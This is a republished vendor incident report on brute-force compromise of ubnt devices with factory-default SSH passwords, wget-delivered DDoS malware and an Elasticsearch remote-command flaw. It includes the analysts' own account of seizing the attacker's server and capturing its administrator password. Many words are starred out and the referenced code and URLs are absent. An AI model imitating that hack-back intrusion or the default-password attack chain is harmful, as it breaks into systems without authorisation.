Shulou(Shulou.com)06/01 Report--

This paper describes in detail the whole process of finding the victim, analyzing the behavior, counterattacking the server, successfully obtaining the authority and completing the forensics. There are also a lot of such *, especially for system-specific targeting (but "blind scan") * *.

Recently, the Anheng security research team has monitored a large number of people who use weak passwords to crack port 22 violently. After detailed analysis by the security team, we found that a large number of ubnt devices on the network have weak passwords and have been implanted into the back door using automated tools. The Anheng APT network early warning platform successfully detected this threat *:

On March 19th, after receiving the feedback of a customer's network failure, Anheng engineer contacted the customer and made a remote emergency response, and some suspicious shell processes were found in one of the customer's equipment.

It is found that the main function of these shell scripts is to download and run some suspicious files through wget, and finally delete the downloaded files, resulting in the difficulty of forensics in the later stage.

We tried to open the malicious page involved as follows:

From the picture above, we can see:

The suspicious ip:222.*.*.62 "10010" file was downloaded 9108 times in one day.

Suspect ip:180.*.*.241 's "hope9" file was downloaded 396 times in 48 minutes.

After analysis, we find that the two suspicious files are DDOS tools under the MIPS framework, which foreign researchers call "Mr. Black"

The main functions are some common DDOS*** methods such as GET_Flood, SYN_Flood, UDP_Flood and so on.

The next day, we continued to observe and found that the number of downloads of one of the malicious files had changed from 9108 to 15171.

We attach great importance to the increase of 6000 downloads in one day.

We controlled the malicious server through technical means, and after entering through the remote desktop, we found that the host's port 8000 has established network communication with many other ip.

Open several ip at random and find that they are all ubnt devices!

During the forensics, we found a lot of software on the desktop.

And coincidentally, * * also happened to log in to this machine remotely.

Use netstat to find * * IP

Malicious IP:139.201.133.104 was found. Query ip138. This ip belongs to "Sichuan".

Later, we successfully used the tool to catch the administrator's password, and after logging in with the account number and password of administrator, we found that the remote control tool was open.

It can be seen from the picture that it is listening on port 8000 and the number of hosts that have been controlled is 564.

Port 8000 is also consistent with the results we use "netstat" to view!

In addition, when using tcpview to check the network connection, it is also * * port 9200 of other IP.

Port 9200 is Elasticsearch? The port opened by the service can be * * exploited * due to the vulnerability of remote command execution in the old version of Elasticsearch. Its POC is as follows:

For details, please see: http://www.wooyun.org/bugs/wooyun-2014-062127

So * also uses port 9200 to implant the backdoor (worm of linux architecture)

Note that * here is the "Elasticsearch" server, which is implanted as follows:

After obtaining the relevant malicious files from the forensics, we found that the tool implanted into the ubnt device is called "linux Command batch execution tool".

The commands for implanting malicious programs here are the same as those we see on customer devices!

It is inferred that the whole * process is as follows:

Brute force to crack port 22 with weak password

Call the shell command to populate the backdoor

* after sending instructions to the device being *

From the results saved after scanning, we can see that a large number of ubnt devices have weak passwords. (the username and password used for brute force cracking are the default passwords for ubnt devices when they leave the factory! )

We randomly tried several devices and found that there was a default weak password, and multiple devices were implanted with worms with different URL multiple times.

Preliminary statistics of URL include:

And the malicious URL is constantly changing (Note: not all of it!)

Later, after our analysis, we found that there are many malicious files including * .f3322.org and * .f3322.net websites as control domain names of malicious services. The registration information of these two domain names is the same as pubyu.com (3322.org in previous life). They both provide free second-level domain name registration services, so they are very popular!

Anheng security team once again reminded customers to do security awareness education to put an end to all kinds of weak passwords and default passwords. In addition, with the rapid development of the Internet of things, personal computers may no longer be the main object of intrusion, and all devices connected to the network may be invaded. Major traditional equipment manufacturers should also shoulder the responsibility of protecting the interests of customers!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.